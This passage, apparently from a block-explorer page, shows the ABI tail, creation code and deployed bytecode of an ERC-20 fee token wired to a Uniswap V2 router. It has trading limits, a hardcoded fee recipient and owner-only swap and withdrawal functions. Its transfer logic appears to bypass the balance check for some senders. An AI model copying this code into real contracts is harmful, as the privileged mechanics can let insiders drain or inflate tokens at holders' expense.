l"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a0604052620000126009600a62000528565b6200002290633b9aca0062000540565b6009556009600a62000035919062000528565b62000045906301312d0062000540565b600a556009600a62000058919062000528565b62000068906301312d0062000540565b600b55620000796009600a62000528565b62000088906298968062000540565b600c55600f805461ffff19169055600160108190556011819055601281905560138190556014819055601555348015620000c157600080fd5b506040805180820182526006808252650c1e10d2105160d21b6020808401829052845180860190955291845290830152906003620001008382620005fe565b5060046200010f8282620005fe565b5050506200012c62000126620001f560201b60201c565b620001f9565b737a250d5630b4cf539739df2c5dacb4c659f2488d6080819052620001539060016200024b565b600880546001600160a01b0319163390811790915562000176905b60016200024b565b600780546001600160a01b031916339081179091556200019890600162000280565b620001a530600162000280565b620001b461dead600162000280565b620001bf336200016e565b620001cc3060016200024b565b620001db61dead60016200024b565b620001ef30600954620002e960201b60201c565b620006e0565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b62000255620003b0565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b6200028a620003b0565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038216620003455760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060026000828254620003599190620006ca565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6005546001600160a01b031633146200040c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016200033c565b565b505050565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200046a5781600019048211156200044e576200044e62000413565b808516156200045c57918102915b93841c93908002906200042e565b509250929050565b600082620004835750600162000522565b81620004925750600062000522565b8160018114620004ab5760028114620004b657620004d6565b600191505062000522565b60ff841115620004ca57620004ca62000413565b50506001821b62000522565b5060208310610133831016604e8410600b8410161715620004fb575081810a62000522565b62000507838362000429565b80600019048211156200051e576200051e62000413565b0290505b92915050565b60006200053960ff84168362000472565b9392505050565b808202811582820484141762000522576200052262000413565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200058557607f821691505b602082108103620005a657634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200040e57600081815260208120601f850160051c81016020861015620005d55750805b601f850160051c820191505b81811015620005f657828155600101620005e1565b505050505050565b81516001600160401b038111156200061a576200061a6200055a565b62000632816200062b845462000570565b84620005ac565b602080601f8311600181146200066a5760008415620006515750858301515b600019600386901b1c1916600185901b178555620005f6565b600085815260208120601f198616915b828110156200069b578886015182559484019460019091019084016200067a565b5085821015620006ba5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b8082018082111562000522576200052262000413565b608051611ec962000734600039600081816103ee01528181610b1401528181610ba501528181610cf101528181610d7601528181610dbc01528181611103015281816111bc01526111f80152611ec96000f3fe6080604052600436106102295760003560e01c80637571336a11610123578063c8c8ebe4116100ab578063e6990a901161006f578063e6990a9014610626578063e6d40d601461063c578063f2fde38b14610652578063f8b45b0514610672578063ffb54a991461068857600080fd5b8063c8c8ebe4146105af578063c9567bf9146105c5578063ca703075146105da578063dd62ed3e146105f0578063e2f456051461061057600080fd5b80639a7a23d6116100f25780639a7a23d61461050f5780639bbad4101461052f578063a457c2d71461054f578063a9059cbb1461056f578063c02466681461058f57600080fd5b80637571336a146104a757806389291a8f146104c75780638da5cb5b146104dc57806395d89b41146104fa57600080fd5b806339509351116101b1578063590f897e11610175578063590f897e146104285780636ddd17131461043e57806370a082311461045d578063715018a61461047d578063751039fc1461049257600080fd5b8063395093511461035857806340b9a54b146103785780634fbee1931461038e57806351bc3c85146103c7578063583e0568146103dc57600080fd5b8063239cd5a5116101f8578063239cd5a5146102c957806323b872dd146102eb578063311028af1461030b578063313ce5671461032157806332424aa31461034357600080fd5b806306fdde0314610235578063095ea7b3146102605780630c6b67371461029057806318160ddd146102b457600080fd5b3661023057005b600080fd5b34801561024157600080fd5b5061024a6106a2565b6040516102579190611b03565b60405180910390f35b34801561026c57600080fd5b5061028061027b366004611b66565b610734565b6040519015158152602001610257565b34801561029c57600080fd5b506102a6600e5481565b604051908152602001610257565b3480156102c057600080fd5b506002546102a6565b3480156102d557600080fd5b506102e96102e4366004611b92565b61074e565b005b3480156102f757600080fd5b50610280610306366004611bab565b610795565b34801561031757600080fd5b506102a660095481565b34801561032d57600080fd5b5060095b60405160ff9091168152602001610257565b34801561034f57600080fd5b50610331600981565b34801561036457600080fd5b50610280610373366004611b66565b6107b9565b34801561038457600080fd5b506102a660125481565b34801561039a57600080fd5b506102806103a9366004611bec565b6001600160a01b031660009081526016602052604090205460ff1690565b3480156103d357600080fd5b506102e96107db565b3480156103e857600080fd5b506104107f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610257565b34801561043457600080fd5b506102a660135481565b34801561044a57600080fd5b50600f5461028090610100900460ff1681565b34801561046957600080fd5b506102a6610478366004611bec565b610814565b34801561048957600080fd5b506102e961082f565b34801561049e57600080fd5b506102e9610843565b3480156104b357600080fd5b506102e96104c2366004611c17565b610861565b3480156104d357600080fd5b506102e9610894565b3480156104e857600080fd5b506005546001600160a01b0316610410565b34801561050657600080fd5b5061024a610916565b34801561051b57600080fd5b506102e961052a366004611c17565b610925565b34801561053b57600080fd5b506102e961054a366004611b92565b6109b3565b34801561055b57600080fd5b5061028061056a366004611b66565b6109d3565b34801561057b57600080fd5b5061028061058a366004611b66565b610a4e565b34801561059b57600080fd5b506102e96105aa366004611c17565b610a5c565b3480156105bb57600080fd5b506102a6600a5481565b3480156105d157600080fd5b506102e9610ac3565b3480156105e657600080fd5b506102a6600d5481565b3480156105fc57600080fd5b506102a661060b366004611c50565b610ee7565b34801561061c57600080fd5b506102a6600c5481565b34801561063257600080fd5b506102a660115481565b34801561064857600080fd5b506102a660105481565b34801561065e57600080fd5b506102e961066d366004611bec565b610f12565b34801561067e57600080fd5b506102a6600b5481565b34801561069457600080fd5b50600f546102809060ff1681565b6060600380546106b190611c7e565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611c7e565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b600033610742818585610f88565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b03161461076e57600080fd5b600061077930610814565b90508082111561078857600080fd5b610791826110ac565b5050565b6000336107a3858285611280565b6107ae8585856112fa565b506001949350505050565b6000336107428185856107cc8383610ee7565b6107d69190611cce565b610f88565b6008546001600160a01b0316336001600160a01b0316146107fb57600080fd5b600061080630610814565b9050610811816110ac565b50565b6001600160a01b031660009081526020819052604090205490565b610837611897565b61084160006118f1565b565b61084b611897565b600061085660025490565b600a819055600b5550565b610869611897565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b61089c611897565b600047116108ea5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02916000818181858888f19350505050158015610811573d6000803e3d6000fd5b6060600480546106b190611c7e565b61092d611897565b6006546001600160a01b03908116908316036109a95760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108e1565b6107918282611943565b6109bb611897565b6109cd81670de0b6b3a7640000611ce1565b600c5550565b600033816109e18286610ee7565b905083811015610a415760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108e1565b6107ae8286868403610f88565b6000336107428185856112fa565b610a64611897565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610acb611897565b600f5460ff1615610b125760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108e1565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b949190611cf8565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c259190611cf8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610c72573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c969190611cf8565b600680546001600160a01b0319166001600160a01b03929092169182179055610cc0906001611943565b600654610cd7906001600160a01b03166001610861565b60065460405163095ea7b360e01b81526001600160a01b037f00000000000000000000000000000000000000000000000000000000000000008116600483015260001960248301529091169063095ea7b3906044016020604051808303816000875af1158015610d4b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6f9190611d15565b50610d9d307f0000000000000000000000000000000000000000000000000000000000000000600954610f88565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169163f305d71991479181906370a0823190602401602060405180830381865afa158015610e0d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e319190611d32565b600080610e466005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610eae573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ed39190611d4b565b5050600f805461ffff191661010117905550565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f1a611897565b6001600160a01b038116610f7f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108e1565b610811816118f1565b6001600160a01b038316610fea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108e1565b6001600160a01b03821661104b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108e1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106110e1576110e1611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561115f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111839190611cf8565b8160018151811061119657611196611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250506111e1307f000000000000000000000000000000000000000000000000000000000000000084610f88565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac9479061124a9085906000908690738c238fea1bb6fdeb0c75d480ced8306eebb5b89f904290600401611d8f565b600060405180830381600087803b15801561126457600080fd5b505af1158015611278573d6000803e3d6000fd5b505050505050565b600061128c8484610ee7565b905060001981146112f457818110156112e75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108e1565b6112f48484848403610f88565b50505050565b6001600160a01b0383166113205760405162461bcd60e51b81526004016108e190611e00565b601454600d5410611332576010546012555b601554600e5410611344576011546013555b8060000361135d5761135883836000611997565b505050565b6005546001600160a01b0384811691161480159061138957506005546001600160a01b03838116911614155b801561139d57506001600160a01b03821615155b80156113b457506001600160a01b03821661dead14155b80156113ca5750600854600160a01b900460ff16155b156116c857600f5460ff1661145d576001600160a01b03831660009081526016602052604090205460ff168061141857506001600160a01b03821660009081526016602052604090205460ff165b61145d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108e1565b6001600160a01b03831660009081526018602052604090205460ff16801561149e57506001600160a01b03821660009081526017602052604090205460ff16155b1561158757600a548111156115135760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108e1565b600b5461151f83610814565b6115299083611cce565b111561156d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b600d805490600061157d83611e45565b91905055506116c8565b6001600160a01b03821660009081526018602052604090205460ff1680156115c857506001600160a01b03831660009081526017602052604090205460ff16155b1561164e57600a5481111561163e5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108e1565b600e805490600061157d83611e45565b6001600160a01b03821660009081526017602052604090205460ff166116c857600b5461167a83610814565b6116849083611cce565b11156116c85760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b60006116d330610814565b9050801580159081906116ed5750600f54610100900460ff165b80156117035750600854600160a01b900460ff16155b801561172857506001600160a01b03851660009081526018602052604090205460ff16155b801561174d57506001600160a01b03851660009081526016602052604090205460ff16155b801561177257506001600160a01b03841660009081526016602052604090205460ff16155b156117a1576008805460ff60a01b1916600160a01b17905561179383611abf565b6008805460ff60a01b191690555b6008546001600160a01b03861660009081526016602052604090205460ff600160a01b9092048216159116806117ef57506001600160a01b03851660009081526016602052604090205460ff165b156117f8575060005b60008115611883576001600160a01b03861660009081526018602052604090205460ff161561184857611841606461183b60135488611ae490919063ffffffff16565b90611af7565b9050611865565b611862606461183b60125488611ae490919063ffffffff16565b90505b801561187657611876873083611997565b6118808186611e5e565b94505b61188e878787611997565b50505050505050565b6005546001600160a01b031633146108415760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108e1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119bd5760405162461bcd60e51b81526004016108e190611e00565b6001600160a01b03831660009081526020819052604090205481811015806119ed57506001600160a01b03831630145b611a485760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108e1565b818110611a5757818103611a5a565b60005b6001600160a01b038581166000818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36112f4565b6000611aca30610814565b9050600081600003611ad95750815b5080611358816110ac565b6000611af08284611ce1565b9392505050565b6000611af08284611e71565b600060208083528351808285015260005b81811015611b3057858101830151858201604001528201611b14565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461081157600080fd5b60008060408385031215611b7957600080fd5b8235611b8481611b51565b946020939093013593505050565b600060208284031215611ba457600080fd5b5035919050565b600080600060608486031215611bc057600080fd5b8335611bcb81611b51565b92506020840135611bdb81611b51565b929592945050506040919091013590565b600060208284031215611bfe57600080fd5b8135611af081611b51565b801515811461081157600080fd5b60008060408385031215611c2a57600080fd5b8235611c3581611b51565b91506020830135611c4581611c09565b809150509250929050565b60008060408385031215611c6357600080fd5b8235611c6e81611b51565b91506020830135611c4581611b51565b600181811c90821680611c9257607f821691505b602082108103611cb257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561074857610748611cb8565b808202811582820484141761074857610748611cb8565b600060208284031215611d0a57600080fd5b8151611af081611b51565b600060208284031215611d2757600080fd5b8151611af081611c09565b600060208284031215611d4457600080fd5b5051919050565b600080600060608486031215611d6057600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ddf5784516001600160a01b031683529383019391830191600101611dba565b50506001600160a01b03969096166060850152505050608001529392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b600060018201611e5757611e57611cb8565b5060010190565b8181038181111561074857610748611cb8565b600082611e8e57634e487b7160e01b600052601260045260246000fd5b50049056fea264697066735822122005dab75081cd3ff0a9a829c4ebaba5d38ba0687691addab54bd9f9fe3f62880e64736f6c63430008120033
Deployed Bytecode
0x6080604052600436106102295760003560e01c80637571336a11610123578063c8c8ebe4116100ab578063e6990a901161006f578063e6990a9014610626578063e6d40d601461063c578063f2fde38b14610652578063f8b45b0514610672578063ffb54a991461068857600080fd5b8063c8c8ebe4146105af578063c9567bf9146105c5578063ca703075146105da578063dd62ed3e146105f0578063e2f456051461061057600080fd5b80639a7a23d6116100f25780639a7a23d61461050f5780639bbad4101461052f578063a457c2d71461054f578063a9059cbb1461056f578063c02466681461058f57600080fd5b80637571336a146104a757806389291a8f146104c75780638da5cb5b146104dc57806395d89b41146104fa57600080fd5b806339509351116101b1578063590f897e11610175578063590f897e146104285780636ddd17131461043e57806370a082311461045d578063715018a61461047d578063751039fc1461049257600080fd5b8063395093511461035857806340b9a54b146103785780634fbee1931461038e57806351bc3c85146103c7578063583e0568146103dc57600080fd5b8063239cd5a5116101f8578063239cd5a5146102c957806323b872dd146102eb578063311028af1461030b578063313ce5671461032157806332424aa31461034357600080fd5b806306fdde0314610235578063095ea7b3146102605780630c6b67371461029057806318160ddd146102b457600080fd5b3661023057005b600080fd5b34801561024157600080fd5b5061024a6106a2565b6040516102579190611b03565b60405180910390f35b34801561026c57600080fd5b5061028061027b366004611b66565b610734565b6040519015158152602001610257565b34801561029c57600080fd5b506102a6600e5481565b604051908152602001610257565b3480156102c057600080fd5b506002546102a6565b3480156102d557600080fd5b506102e96102e4366004611b92565b61074e565b005b3480156102f757600080fd5b50610280610306366004611bab565b610795565b34801561031757600080fd5b506102a660095481565b34801561032d57600080fd5b5060095b60405160ff9091168152602001610257565b34801561034f57600080fd5b50610331600981565b34801561036457600080fd5b50610280610373366004611b66565b6107b9565b34801561038457600080fd5b506102a660125481565b34801561039a57600080fd5b506102806103a9366004611bec565b6001600160a01b031660009081526016602052604090205460ff1690565b3480156103d357600080fd5b506102e96107db565b3480156103e857600080fd5b506104107f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b039091168152602001610257565b34801561043457600080fd5b506102a660135481565b34801561044a57600080fd5b50600f5461028090610100900460ff1681565b34801561046957600080fd5b506102a6610478366004611bec565b610814565b34801561048957600080fd5b506102e961082f565b34801561049e57600080fd5b506102e9610843565b3480156104b357600080fd5b506102e96104c2366004611c17565b610861565b3480156104d357600080fd5b506102e9610894565b3480156104e857600080fd5b506005546001600160a01b0316610410565b34801561050657600080fd5b5061024a610916565b34801561051b57600080fd5b506102e961052a366004611c17565b610925565b34801561053b57600080fd5b506102e961054a366004611b92565b6109b3565b34801561055b57600080fd5b5061028061056a366004611b66565b6109d3565b34801561057b57600080fd5b5061028061058a366004611b66565b610a4e565b34801561059b57600080fd5b506102e96105aa366004611c17565b610a5c565b3480156105bb57600080fd5b506102a6600a5481565b3480156105d157600080fd5b506102e9610ac3565b3480156105e657600080fd5b506102a6600d5481565b3480156105fc57600080fd5b506102a661060b366004611c50565b610ee7565b34801561061c57600080fd5b506102a6600c5481565b34801561063257600080fd5b506102a660115481565b34801561064857600080fd5b506102a660105481565b34801561065e57600080fd5b506102e961066d366004611bec565b610f12565b34801561067e57600080fd5b506102a6600b5481565b34801561069457600080fd5b50600f546102809060ff1681565b6060600380546106b190611c7e565b80601f01602080910402602001604051908101604052809291908181526020018280546106dd90611c7e565b801561072a5780601f106106ff5761010080835404028352916020019161072a565b820191906000526020600020905b81548152906001019060200180831161070d57829003601f168201915b5050505050905090565b600033610742818585610f88565b60019150505b92915050565b6008546001600160a01b0316336001600160a01b03161461076e57600080fd5b600061077930610814565b90508082111561078857600080fd5b610791826110ac565b5050565b6000336107a3858285611280565b6107ae8585856112fa565b506001949350505050565b6000336107428185856107cc8383610ee7565b6107d69190611cce565b610f88565b6008546001600160a01b0316336001600160a01b0316146107fb57600080fd5b600061080630610814565b9050610811816110ac565b50565b6001600160a01b031660009081526020819052604090205490565b610837611897565b61084160006118f1565b565b61084b611897565b600061085660025490565b600a819055600b5550565b610869611897565b6001600160a01b03919091166000908152601760205260409020805460ff1916911515919091179055565b61089c611897565b600047116108ea5760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064015b60405180910390fd5b60405133904780156108fc02916000818181858888f19350505050158015610811573d6000803e3d6000fd5b6060600480546106b190611c7e565b61092d611897565b6006546001600160a01b03908116908316036109a95760405162461bcd60e51b815260206004820152603560248201527f506169722063616e6e6f742062652072656d6f7665642066726f6d206175746f6044820152746d617465644d61726b65744d616b6572506169727360581b60648201526084016108e1565b6107918282611943565b6109bb611897565b6109cd81670de0b6b3a7640000611ce1565b600c5550565b600033816109e18286610ee7565b905083811015610a415760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016108e1565b6107ae8286868403610f88565b6000336107428185856112fa565b610a64611897565b6001600160a01b038216600081815260166020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610acb611897565b600f5460ff1615610b125760405162461bcd60e51b8152602060048201526011602482015270151c98591a5b99c81a5cc81bdc195b9959607a1b60448201526064016108e1565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b949190611cf8565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c259190611cf8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610c72573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c969190611cf8565b600680546001600160a01b0319166001600160a01b03929092169182179055610cc0906001611943565b600654610cd7906001600160a01b03166001610861565b60065460405163095ea7b360e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d8116600483015260001960248301529091169063095ea7b3906044016020604051808303816000875af1158015610d4b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d6f9190611d15565b50610d9d307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600954610f88565b6040516370a0823160e01b815230600482018190526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169163f305d71991479181906370a0823190602401602060405180830381865afa158015610e0d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e319190611d32565b600080610e466005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610eae573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ed39190611d4b565b5050600f805461ffff191661010117905550565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610f1a611897565b6001600160a01b038116610f7f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016108e1565b610811816118f1565b6001600160a01b038316610fea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016108e1565b6001600160a01b03821661104b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108e1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106110e1576110e1611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561115f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111839190611cf8565b8160018151811061119657611196611d79565b60200260200101906001600160a01b031690816001600160a01b0316815250506111e1307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610f88565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac9479061124a9085906000908690738c238fea1bb6fdeb0c75d480ced8306eebb5b89f904290600401611d8f565b600060405180830381600087803b15801561126457600080fd5b505af1158015611278573d6000803e3d6000fd5b505050505050565b600061128c8484610ee7565b905060001981146112f457818110156112e75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108e1565b6112f48484848403610f88565b50505050565b6001600160a01b0383166113205760405162461bcd60e51b81526004016108e190611e00565b601454600d5410611332576010546012555b601554600e5410611344576011546013555b8060000361135d5761135883836000611997565b505050565b6005546001600160a01b0384811691161480159061138957506005546001600160a01b03838116911614155b801561139d57506001600160a01b03821615155b80156113b457506001600160a01b03821661dead14155b80156113ca5750600854600160a01b900460ff16155b156116c857600f5460ff1661145d576001600160a01b03831660009081526016602052604090205460ff168061141857506001600160a01b03821660009081526016602052604090205460ff165b61145d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108e1565b6001600160a01b03831660009081526018602052604090205460ff16801561149e57506001600160a01b03821660009081526017602052604090205460ff16155b1561158757600a548111156115135760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108e1565b600b5461151f83610814565b6115299083611cce565b111561156d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b600d805490600061157d83611e45565b91905055506116c8565b6001600160a01b03821660009081526018602052604090205460ff1680156115c857506001600160a01b03831660009081526017602052604090205460ff16155b1561164e57600a5481111561163e5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108e1565b600e805490600061157d83611e45565b6001600160a01b03821660009081526017602052604090205460ff166116c857600b5461167a83610814565b6116849083611cce565b11156116c85760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108e1565b60006116d330610814565b9050801580159081906116ed5750600f54610100900460ff165b80156117035750600854600160a01b900460ff16155b801561172857506001600160a01b03851660009081526018602052604090205460ff16155b801561174d57506001600160a01b03851660009081526016602052604090205460ff16155b801561177257506001600160a01b03841660009081526016602052604090205460ff16155b156117a1576008805460ff60a01b1916600160a01b17905561179383611abf565b6008805460ff60a01b191690555b6008546001600160a01b03861660009081526016602052604090205460ff600160a01b9092048216159116806117ef57506001600160a01b03851660009081526016602052604090205460ff165b156117f8575060005b60008115611883576001600160a01b03861660009081526018602052604090205460ff161561184857611841606461183b60135488611ae490919063ffffffff16565b90611af7565b9050611865565b611862606461183b60125488611ae490919063ffffffff16565b90505b801561187657611876873083611997565b6118808186611e5e565b94505b61188e878787611997565b50505050505050565b6005546001600160a01b031633146108415760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108e1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119bd5760405162461bcd60e51b81526004016108e190611e00565b6001600160a01b03831660009081526020819052604090205481811015806119ed57506001600160a01b03831630145b611a485760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108e1565b818110611a5757818103611a5a565b60005b6001600160a01b038581166000818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f